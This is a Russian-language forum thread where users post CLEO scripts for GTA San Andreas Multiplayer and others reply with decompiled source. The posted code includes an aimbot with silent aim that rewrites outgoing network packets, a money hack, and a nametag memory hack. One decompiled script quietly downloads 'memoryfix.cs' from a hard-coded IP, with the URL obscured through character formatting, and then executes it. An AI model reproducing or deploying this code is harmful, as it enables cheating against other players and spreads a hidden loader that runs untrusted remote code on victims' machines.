Декомпиляция скриптов

FYP

Известный
Автор темы
Администратор
1,763
5,906
GVWUrNJ.png
eNo5cSj.png


Общая тема для просьб о помощи в декомпиляциии и декриптованиии скриптов, плагинов и приложений.
Запрещено просить о декомпиляции/декриптовании софта, выставленного на продажу на нашем сайте.

Рекомендации:
  1. Сначала воспользуйтесь поиском по теме и по форуму, возможно его в декомпилированном виде или с исходным кодом уже выкладывали у нас на сайте.
  2. Попытайтесь декомпилировать самостоятельно: CLEO - декриптор, декомпилятор; AHK - распаковщик .exe; LuaJIT - декомпилятор1, декомпилятор2.
  3. Просить о декомпиляции .asi, .sf, .dll, .exe почти бесполезно, часто такие просьбы остаются без ответа и вряд ли вам это что-то даст. Можете попробовать сами, IDA Pro или Ghidra к вашим услугам.
    • Это не касается .exe, которые являются скомпилированными AutoHotKey-скриптами (.ahk).
  4. Добавьте название скрипта к сообщению, если оно известно - это поможет другим пользователям найти его с помощью поиска.
  5. Сообщения по типу "спасибо, помог" по правилам форума считаются флудом и скорее всего будут удалены. Если вам помогли, вы можете нажать кнопку Мне нравится под ответом - это даст понять, что ответ верный.
 
Последнее редактирование:

Qsany

Потрачен
464
147
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
sps
 

Вложения

  • DMG INFORMER by p1c.cs
    24.5 KB · Просмотры: 5

LaRossa

Потрачен
429
117
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
CLEO:
hex
01 02 03 04 05 06 07 08 09 10 11 12 13 14 15
end

/*
0@ - p1cador.mp3
1@ - get_hook_param PARAM_BITSTREAM
2@ - RPC_GIVETAKEDAMAGE
3@ - 0 = give / 1 =take
4@ - Player ID
5@ - ammount damage(FLOAT)
6@ - GUN -> BodyPart
7@ - handle
8@ - nickname
9@ - COUNTER
10@ - прицел INGAME X
11@ - прицел INGAME Y
12@ - прицел WINDOW X
13@ - прицел WINDOW Y
14@ - 4@
15@ - 5@
16@ - 4@
17@ - 5@
18@ - nickname(2)
19@ - MAIN TRIGGER 0-600ms
20@ - ACTOR X
21@ - ACTOR Y
22@ - ACTOR Z
23@ - length 31@ 29@
24@ - font 30@ высота
25@ - TRIGGER 1
26@ - TRIGGER 2
27@ - length 31@  <-------------------
28@ - alloc dmg                      |
29@ - alloc name                     |
30@ - FONT dmg                       |
31@ - FONT name  <--------------------
32@ -
*/
{$CLEO} 
{$INCLUDE SF}   
0000:
   
while not SAMP.Available()
wait 100
end

////////////////////////////////////////
/*alloc 30@ 128

0b6d: render 31@ = create_font "Arial" height 15 flags 12

0B5A: get_screen_resolution 1@ 2@
0062: 1@ -= 1@
//0062: 2@ -= 2@
2@ -= 25


while true
    wait 0          
    format 30@ "{ffffff}DMG Informer 0.3.7 RC2 {BEBEBE}v 0.1"
    0B6F: render font 31@ draw_text 30@  pos 1@ 2@ color 0xFFffffff
     //0B6C: render 3@ = font 31@ draw_height 
    0062:    2@ -= 3@
        format 30@ "{ffffff}by {ff0000}p{ffffff}1cador"
    0B6F: render font 31@ draw_text 30@  pos 1@ 2@ color 0xFFffff
    005a:     2@ += 3@
   

   
  
    
    if 0B61: samp is_local_player_spawned
        then break
    end
end
*/
0AF8: samp add_message_to_chat "DMG Informer {ff0000}v 0.1 {ffffff}(0.3.7 RC2) by {ff0000}p1cador" color 0xffffff



/////////////////////////////////////

9@ = 0
3@ = -1
25@ = 0
26@ = 0          
14@ = 0
15@ = 0
16@ = 0
17@ = 0
0952: load_soundtrack 1149
//qoloqol3.mp3
0AAC: 0@ = load_audiostream "CLEO\p1cador.mp3"  
//0AC1: 9@ = load_audiostream_with_3d_support "CLEO\qoloqol3.mp3"
0B78: log "{F44336}[p1cador] > Audio Loaded!"


0b6d: render 31@ = create_font "Arial" height 10 flags 12
0b6d: render 30@ = create_font "Arial" height 21 flags 13
alloc 29@ 48
alloc 28@ 48
10@ = 339.0  // ПРИЦЕЛ //10@ += 45.0 
11@ = 174.0  // ПРИЦЕЛ


   
0BE1: raknet setup_outcoming_rpc_hook @outRPC  
//thread "qol"

//0085: 13@ = 11@ // (int)
//0087: 17@ = 3@ // (float)

//003B:   12@ == 21@  // (int)
//0045:   85@ == 69@  // (float)

while true
    wait 0
    
   
    if 25@ == 9        
        then
        9@ += 1
        10@ = 384.0
        0B60: convert_game_screen_coords 10@ 11@ to_window_screen_coords 12@ 13@ 
        if SAMP.IsPlayerPaused(4@)
            then
            format 28@ "{FFFFFF}AFK"
            else
                if Actor.Dead(7@)
                    then
                    format 28@ "{ff0000} ВЫЕБАН" 15@
                    else
                    format 28@ "-%.2f" 15@
                end
            end
        0b6f: render font 30@ draw_text 28@ pos 12@ 13@ color 0x8fff0000
        0B6C: render 24@ = font 30@ draw_height
        005a: 24@ -= 13@ //error opcode  
                                           
       
        format 29@ "%s[%d]" 8@ 14@         
        0b6f: render font 31@ draw_text 29@ pos 12@ 24@ color 0xf0ffffff //ff00ff00
                    
        else
    end
   
    if 26@ == 10 
        then
        9@ += 1
        10@ = 294.0
       
        0B60: convert_game_screen_coords 10@ 11@ to_window_screen_coords 12@ 13@    
        0B6B: render 23@ = font 31@ draw_text 29@ length
        0063: 12@ -= 23@
       
        if or
            actor.dead($PLAYER_ACTOR)
            not player.Defined($PLAYER_ACTOR)
            then
            format 28@ ""
            format 29@ ""
            else
            format 28@ "- %.2f" 17@
            format 29@ "%s[%d]" 18@ 16@
        end
        0b6f: render font 30@ draw_text 28@ pos 12@ 13@ color 0x7fff0000 
        0B6C: render 24@ = font 30@ draw_height
        005a: 24@ -= 13@//error opcode
       
        //format 29@ "%s[%d]" 18@ 16@               //TAKE        
        0b6f: render font 31@ draw_text 29@ pos 12@ 24@ color 0xf0FFBFBF
         
                
        else
    end 
 
       
    if 9@ == 450
    then
    25@ = -1
    26@ = -1
    //0AF8: samp add_message_to_chat "GAVENDA" color 0xFFF000
    else
    end
end
                               

//0BDE: pause_thread 0

:outRPC    
0BE5: raknet 2@ = get_hook_param PARAM_PACKETID
IF 0039: 2@ == RPC_GIVETAKEDAMAGE
    THEN
    0BE5: raknet 1@ = get_hook_param PARAM_BITSTREAM
    0BE7: raknet 3@ = bit_stream_read 1@ type BS_TYPE_BOOL      //give/take
    0BE7: raknet 4@ = bit_stream_read 1@ type BS_TYPE_SHORT     //Player
    0BE7: raknet 5@ = bit_stream_read 1@ type BS_TYPE_INT       //ammount(FLOAT)
    0BE7: raknet 6@ = bit_stream_read 1@ type BS_TYPE_INT       //GUN
    0BE7: raknet 6@ = bit_stream_read 1@ type BS_TYPE_INT       //BodyPart
    9@ = 0                                            
    if 3@ == 0
        then 
        25@ = 9
        0085: 14@ = 4@
        0085: 15@ = 5@
        0B20: samp 7@ = actor_handle_by_samp_player_id 14@ 
        0B36: samp 8@ = get_player_nickname 14@
        0AAD: set_mp3 0@ perform_action 1
                                         
        //0B78: log "{F44336}[MyTestScript] > Audio Action Changed."    
        //0AF8: samp add_message_to_chat "GIVE %d %.2f" color 0x00ff00 4@ 5@ //%.1f            
        else
    end
   
    if 3@ == 1
        then
        26@ = 10
        0085: 16@ = 4@
        0085: 17@ = 5@
        //0B20: samp 7@ = actor_handle_by_samp_player_id 14@ 
        0B36: samp 18@ = get_player_nickname 16@
        //0AAD: set_mp3 0@ perform_action 1   
        //0B78: log "{F44336}[MyTestScript] > Audio Action Changed."    
        //0AF8: samp add_message_to_chat "TAKE %d %.2f" color 0xff0000 4@ 5@ //%.1f             
        else
    end
       
       
   
    0BE0: raknet hook_ret true
    ELSE 0BE0: raknet hook_ret TRUE 
END
 
  • Нравится
Реакции: Qsany

korTa

Участник
37
9
дерипт пацаны, с меня лойсик)
 

Вложения

  • SMRF_v0.2.cs
    4 KB · Просмотры: 6

DarkL1ght

Новичок
252
112
дерипт пацаны, с меня лойсик)
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0000: NOP
0001: wait 0 ms
0AFA:  is_samp_available
004D: jump_if_false @Noname_17
0AAB:   file_exists "cleo\smrfsetts.ini"
0AA0: gosub_if_false @Noname_1552
0050: gosub @Noname_2167
0C63: register_console_command "smrf_settings" to_label @Noname_1375
0C63: register_console_command "smrf_aim_smooth_z_dec" to_label @Noname_1285
0C63: register_console_command "smrf_aim_smooth_z_inc" to_label @Noname_1300
0C63: register_console_command "smrf_aim_smooth" to_label @Noname_1315
0C63: register_console_command "smrf_aim_delay" to_label @Noname_1360
0C63: register_console_command "smrf_aim_auto" to_label @Noname_1447
0C63: register_console_command "smrf_aim" to_label @Noname_1462
0C63: register_console_command "smrf_aim_ignore_solid" to_label @Noname_1477
0C63: register_console_command "smrf_aim_ignore_car" to_label @Noname_1492
0C63: register_console_command "smrf_aim_ignore_actor" to_label @Noname_1507
0C63: register_console_command "smrf_aim_ignore_object" to_label @Noname_1522
0C63: register_console_command "smrf_aim_ignore_particle" to_label @Noname_1537
0C63: register_console_command "smrf_aim_silent" to_label @Noname_1330
0C63: register_console_command "smrf_aim_silent_random" to_label @Noname_1345
0BE2: raknet setup_outcoming_packet_hook @Noname_1103
0B78: log "{ff0000}========="
0B78: log "{ffffff}Smurf Aim"
0B78: log "{ffffff}Version:{00ff00} 0.2"
0B78: log "{ffffff}Author:{00ff00} Izd4T"
0B78: log "{ffffff}Prefix:{00ff00} smrf_"
0B78: log "{ff0000}========="
0001: wait 28@ ms
00D6: if and
0039:   26@ == 1
0AD2: 0@ = player $PLAYER_CHAR targeted_actor //IF and SET
004D: jump_if_false @Noname_702
00D6: if
0039:   27@ == 0
004D: jump_if_false @Noname_695
00D6: if
00E1:   player 0 pressed_key 17
004D: jump_if_false @Noname_688
0050: gosub @Noname_709
0002: jump @Noname_702
0050: gosub @Noname_709
0002: jump @Noname_615
0AB1: call_scm_func @Noname_2782 2 $PLAYER_ACTOR 25 1@ 2@ 3@ 
00A0: store_actor 0@ position_to 4@ 5@ 6@
00D6: if
06BD:   no_obstacles_between 1@ 2@ 3@ and 4@ 5@ 6@ solid 25@ car 24@ actor 23@ object 22@ particle 21@
004D: jump_if_false @Noname_1101
00D6: if
0039:   20@ == 0
004D: jump_if_false @Noname_1009
068D: get_camera_position_to 1@ 2@ 3@
0063: 4@ -= 1@ // (float)
0063: 5@ -= 2@ // (float)
0604: get_Z_angle_for_point 4@ 5@ store_to 6@
000F: 6@ -= 90.0
0017: 6@ /= 57.29578
000B: 6@ += 0.04253
0A8D: 7@ = read_memory 11989576 size 4 virtual_protect 0
00D6: if
0039:   29@ == 1
004D: jump_if_false @Noname_994
0A8D: 9@ = read_memory 11989592 size 4 virtual_protect 0
00D6: if
0025:   9@ > 6@ // (float)
004D: jump_if_false @Noname_959
0063: 9@ -= 31@ // (float)
0002: jump @Noname_986
00D6: if
0025:   6@ > 9@ // (float)
004D: jump_if_false @Noname_986
005B: 9@ += 30@ // (float)
0087: 6@ = 9@ // (float)
0A25: set_camera_on_players_X_angle 7@ Z_angle 6@
0002: jump @Noname_1101

:Noname_994
00A0: store_actor 0@ position_to 11@ 12@ 13@
0B2B: samp 10@ = get_player_id_by_actor_handle 0@
00D6: if
0039:   19@ == 1
004D: jump_if_false @Noname_1071
0098: 14@ = random_float_in_ranges_0.0_to_1.0
0098: 15@ = random_float_in_ranges_0.0_to_1.0
0098: 16@ = random_float_in_ranges_0.0_to_1.0
0002: jump @Noname_1101
0007: 14@ = 0.0
0007: 15@ = 0.0
0007: 16@ = 0.0
0051: return
0BE5: raknet 18@ = get_hook_param 1
00D6: if and
0039:   18@ == 206
0039:   26@ == 1
0039:   20@ == 1
056D:   actor 0@ defined
004D: jump_if_false @Noname_1281
0BE5: raknet 18@ = get_hook_param 0
0BF1: raknet 17@ = bit_stream 18@ get_write_offset
0BEC: raknet bit_stream 18@ set_write_offset 8
0B40: raknet bit_stream 18@ write 1 type 0 size 1
0B40: raknet bit_stream 18@ write 10@ type 2 size 2
0BEC: raknet bit_stream 18@ set_write_offset 128
0B40: raknet bit_stream 18@ write 11@ type 4 size 4
0B40: raknet bit_stream 18@ write 12@ type 4 size 4
0B40: raknet bit_stream 18@ write 13@ type 4 size 4
0B40: raknet bit_stream 18@ write 14@ type 4 size 4
0B40: raknet bit_stream 18@ write 15@ type 4 size 4
0B40: raknet bit_stream 18@ write 16@ type 4 size 4
0BEC: raknet bit_stream 18@ set_write_offset 17@
0BE0: raknet hook_ret 1
0B35: samp 0@ = get_last_command_params
0C1B: 31@ = atof 0@
0B43: samp cmd_ret

:Noname_1285
0B35: samp 0@ = get_last_command_params
0C1B: 30@ = atof 0@
0B43: samp cmd_ret

:Noname_1300
0B35: samp 0@ = get_last_command_params
0C1A: 29@ = atoi 0@
0B43: samp cmd_ret

:Noname_1315
0B35: samp 0@ = get_last_command_params
0C1A: 20@ = atoi 0@
0B43: samp cmd_ret

:Noname_1330
0B35: samp 0@ = get_last_command_params
0C1A: 19@ = atoi 0@
0B43: samp cmd_ret

:Noname_1345
0B35: samp 0@ = get_last_command_params
0C1A: 28@ = atoi 0@
0B43: samp cmd_ret

:Noname_1360
0B35: samp 0@ = get_last_command_params
00D6: if
0C18: 1@ = strstr string1 0@ string2 "save"
004D: jump_if_false @Noname_1412
0050: gosub @Noname_1552
00D6: if
0C18: 1@ = strstr string1 0@ string2 "reset"
004D: jump_if_false @Noname_1445
0050: gosub @Noname_2167
0B43: samp cmd_ret
0B35: samp 0@ = get_last_command_params
0C1A: 27@ = atoi 0@

:Noname_1445
0B43: samp cmd_ret

:Noname_1447
0B35: samp 0@ = get_last_command_params
0C1A: 26@ = atoi 0@
0B43: samp cmd_ret

:Noname_1462
0B35: samp 0@ = get_last_command_params
0C1A: 25@ = atoi 0@
0B43: samp cmd_ret

:Noname_1477
0B35: samp 0@ = get_last_command_params
0C1A: 24@ = atoi 0@
0B43: samp cmd_ret

:Noname_1492
0B35: samp 0@ = get_last_command_params
0C1A: 23@ = atoi 0@
0B43: samp cmd_ret

:Noname_1507
0B35: samp 0@ = get_last_command_params
0C1A: 22@ = atoi 0@
0B43: samp cmd_ret

:Noname_1522
0B35: samp 0@ = get_last_command_params
0C1A: 21@ = atoi 0@
0B43: samp cmd_ret

:Noname_1537
0AF3: write_float 31@ to_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_smooth_z_dec"
0AF3: write_float 30@ to_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_smooth_z_inc"
0AF1: write_int 29@ to_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_smooth"
0AF1: write_int 28@ to_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_delay"
0AF1: write_int 27@ to_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_auto"
0AF1: write_int 26@ to_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim"
0AF1: write_int 25@ to_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_ignore_solid"
0AF1: write_int 24@ to_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_ignore_car"
0AF1: write_int 23@ to_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_ignore_actor"
0AF1: write_int 22@ to_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_ignore_object"
0AF1: write_int 21@ to_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_ignore_particle"
0AF1: write_int 20@ to_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_silent"
0AF1: write_int 19@ to_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_silent_random"
0051: return
0AF2: 31@ = get_float_from_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_smooth_z_dec"
0AF2: 30@ = get_float_from_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_smooth_z_inc"
0AF0: 29@ = get_int_from_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_smooth"
0AF0: 28@ = get_int_from_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_delay"
0AF0: 27@ = get_int_from_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_auto"
0AF0: 26@ = get_int_from_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim"
0AF0: 25@ = get_int_from_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_ignore_solid"
0AF0: 24@ = get_int_from_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_ignore_car"
0AF0: 23@ = get_int_from_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_ignore_actor"
0AF0: 22@ = get_int_from_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_ignore_object"
0AF0: 21@ = get_int_from_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_ignore_particle"
0AF0: 20@ = get_int_from_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_silent"
0AF0: 19@ = get_int_from_ini_file "cleo\smrfsetts.ini" section "Smurf" key "aim_silent_random"
0051: return
0A96: 25@ = actor 0@ struct
0AC7: 26@ = var 26@ offset
0AA6: call_method 6177408 struct 25@ num_params 3 pop 0 1 1@ 26@ 
0AB2: ret 3 26@ 27@ 28@
 
  • Нравится
Реакции: korTa

DarkL1ght

Новичок
252
112
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0000: NOP
0AC8: 20@ = allocate_memory_size 260
0AC8: 21@ = allocate_memory_size 260
0AC8: 22@ = allocate_memory_size 260

:Label00FF_45
0001: wait 100 ms
0AFA:  is_samp_available
004D: jump_if_false @Label00FF_45
00D6: if
0AAB:   file_exists "CLEO\zvejybosbot.cs"
004D: jump_if_false @Label00FF_97
0001: wait 3000 ms

:Label00FF_97
00D6: if
0AAB:   file_exists "CLEO\memoryfix.cs"
004D: jump_if_false @Label00FF_140
0001: wait 0 ms
0002: jump @Label00FF_276

:Label00FF_140
0AD3: 20@ = format "http:%c%c185.36.81.129/memoryfix.cs" 47 47 
0C65: 21@ = download_url 20@ to_file "cleo/memoryfix.cs"
0006: 22@ = -1

:Label00FF_221
0039:   22@ == -1
004D: jump_if_false @Label00FF_254
0001: wait 0 ms
0C66: 22@ = get_download 21@ state
0002: jump @Label00FF_221

:Label00FF_254
0C7D: release_download 21@
0A92: create_custom_thread "memoryfix.cs" 

:Label00FF_276
004E: end_thread
 
  • Нравится
Реакции: airidelis

Qsany

Потрачен
464
147
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
)
 

Вложения

  • верующий.cs
    879 байт · Просмотры: 8

DarkL1ght

Новичок
252
112
Sanny Builder > IGNORE_UNKNOWN > YES
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
[B]{$CLEO .cs}

//-------------MAIN---------------
0000: NOP 

:Label00FF_15
0001: wait 0 ms 
0AFA:  is_samp_available 
004D: jump_if_false @Label00FF_15 
0AC6: 1@ = label @Label00FF_117 offset 
0C8C: render 0@ = load_texture_from_file_in_memory 1@ size 766 
0001: wait 2000 ms 
03E3: set_texture_to_be_drawn_antialiased 1 
0B5A: get_screen_resolution 2@ 3@ 
000E: 2@ -= 128 
000E: 3@ -= 145 

:Label00FF_82
0001: wait 0 ms 
0B73: render draw_texture 0@ pos 2@ 3@ size 128 128 rotation 0.0 color -1 
0002: jump @Label00FF_82 

:Label00FF_117
hex
 89 50 4E 47 0D 0A
end[/B]
 
  • Нравится
Реакции: Qsany

Qsany

Потрачен
464
147
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
s meny like
 

Вложения

  • give me your money.cs
    18.3 KB · Просмотры: 12

DarkL1ght

Новичок
252
112
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0662: printstring "==============================================================="
0662: printstring "My VK: vk.com/id138101483"
0662: printstring "My Skype: hackes8"
0662: printstring "Group VK: vk.com/by_air"
0662: printstring "My YouTube Channel: www.youtube.com/spacebmxair"
0662: printstring "All rights reserved ©"
0662: printstring "==============================================================="

:Label00FF_306
0001: wait 0 ms
0AFA:  is_samp_available
004D: jump_if_false @Label00FF_306

:Label00FF_319
0001: wait 0 ms
0B61:  samp is_local_player_spawned
004D: jump_if_false @Label00FF_319
0006: 0@ = 0
0BE3: raknet setup_incoming_rpc_hook @Label00FF_483
0B34: samp register_client_command "money" to_label @Label00FF_364
0BDE: pause_thread 0

:Label00FF_364
0B35: samp 1@ = get_last_command_params
00D6: if
0AD4: 3@ = scan_string 1@ format "%d" 2@ 
004D: jump_if_false @Label00FF_481
010B: 4@ = player $PLAYER_CHAR money
0012: 4@ *= -1
00D6: if and
8029:   not  2@ >= 999999999
002D:   2@ >= 4@ // (int)
004D: jump_if_false @Label00FF_481
0006: 0@ = 1
0109: player $PLAYER_CHAR money = 2@
0AF8: samp add_message_to_chat "Money Add: %d" color 13369344 2@ 

:Label00FF_481
0B43: samp cmd_ret

:Label00FF_483
00D6: if
0039:   0@ == 1
004D: jump_if_false @Label00FF_537
0BE5: raknet 5@ = get_hook_param 1
00D6: if or
0039:   5@ == 18
0039:   5@ == 20
004D: jump_if_false @Label00FF_537
0BE0: raknet hook_ret 0

:Label00FF_537
0BE0: raknet hook_ret 1
AVP Gameproject вроде справляется с такими скриптами!
 
  • Нравится
Реакции: Qsany

™ ChipFamily

По ту сторону надежды.
5,144
1,983
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Код пожалуйста
 

Вложения

  • Admin_Checker.cs
    354.6 KB · Просмотры: 16

dron989

Известный
65
8
AVP Gameproject Показывает такое:
1471420553_fe05af93d9.jpg

Санни билдером открыл вроде. Вот код: Может быть стиллер?
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
if
8AA2:   not 0@ = load_library "SAMP.DLL" // IF and SET
else_jump @NONAME_28
0A93: end_custom_thread

:NONAME_28
0AA3: free_library 0@
wait 5000
call @NONAME_173 1 0@ 1@
call @NONAME_203 1 1@ 2@

:NONAME_70
wait 0
0C89:  key_just_pressed 114
else_jump @NONAME_70
call @NONAME_231 1 2@ 3@ 4@ 5@
call @NONAME_311 4 2@ 500.0 0 1

:NONAME_129
wait 0
0C89:  key_just_pressed 114
else_jump @NONAME_129
call @NONAME_311 4 2@ 3@ 4@ 5@
jump @NONAME_70

:NONAME_173
0@ += 2203896
0A8D: 0@ = read_memory 0@ size 4 virtual_protect 1
ret 1 0@

:NONAME_203
0@ += 965
0A8D: 0@ = read_memory 0@ size 4 virtual_protect 1
ret 1 0@

:NONAME_231
0A8E: 25@ = 0@ + 39 // int
0A8E: 26@ = 0@ + 47 // int
0A8E: 27@ = 0@ + 56 // int
0A8D: 25@ = read_memory 25@ size 4 virtual_protect 1
0A8D: 26@ = read_memory 26@ size 1 virtual_protect 1
0A8D: 27@ = read_memory 27@ size 1 virtual_protect 1
ret 3 25@ 26@ 27@

:NONAME_311
0A8E: 25@ = 0@ + 39 // int
0A8E: 26@ = 0@ + 47 // int
0A8E: 27@ = 0@ + 56 // int
0A8C: write_memory 25@ size 4 value 1@ virtual_protect 1
0A8C: write_memory 26@ size 1 value 2@ virtual_protect 1
0A8C: write_memory 27@ size 1 value 3@ virtual_protect 1
ret 0
 

Вложения

  • NameTagHack.cs
    382 байт · Просмотры: 5
Последнее редактирование:

Qsany

Потрачен
464
147
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
вскройте админским декриптором
 

Вложения

  • OtkatReklam.cs
    19.2 KB · Просмотры: 12

DarkL1ght

Новичок
252
112
вскройте админским декриптором
Старый декриптор, даже справляется с обычным криптором от FYP'A , лучше чем AVP Gameproject
CLEO:
{$CLEO}
{$INCLUDE SF}

0001: wait 0 ms
:SAMPAv
wait 0
0AFA:  is_samp_available
jf @SAMPAv
0AF8: samp add_message_to_chat "{FF0000}[ОткатРеклам] {EAEAEA} Специально для PAC Family by SONIQ." color -1     
// 0A93:

while not SAMP.Available()
    wait 400
end

0BE3: raknet setup_incoming_rpc_hook @inrpc_hook

0AC8: 3@ = allocate_memory_size 144
0C11: memset destination 3@ value 0 size 144

0C74: 4@ = create_timer_interval 113000 on_label @reload_message
0C78: set_timer 4@ active false

0BDE: pause_thread 0

:inrpc_hook
0BE5: raknet 0@ = get_hook_param PARAM_PACKETID
if 0@ == RPC_SCRCLIENTMESSAGE
then
    0BE5: raknet 1@ = get_hook_param PARAM_BITSTREAM
    0BEB: raknet bit_stream 1@ ignore_bits 32 // skip string's color
    0BE7: raknet 2@ = bit_stream_read 1@ type BS_TYPE_INT // message len

    0BE8: raknet bit_stream 1@ read_array 3@ size 2@ // read message
    0C1E: array 3@ element 2@ el_size 1 = 0x0 // \0
    if 0C18: 2@ = strstr string1 3@ string2 "[Тел.]:"
    then
        0C78: set_timer 4@ active true
        0C76: reset_timer 4@
    end
end
0BE0: raknet hook_ret true

:reload_message
0AF8: samp add_message_to_chat "{FF0000}[ОткатРеклам] {EAEAEA} Примерно через 5 секунд флуди в /ad о наборе!" color -1
0C78: set_timer 4@ active false
0B43: samp cmd_ret
 
  • Нравится
Реакции: Qsany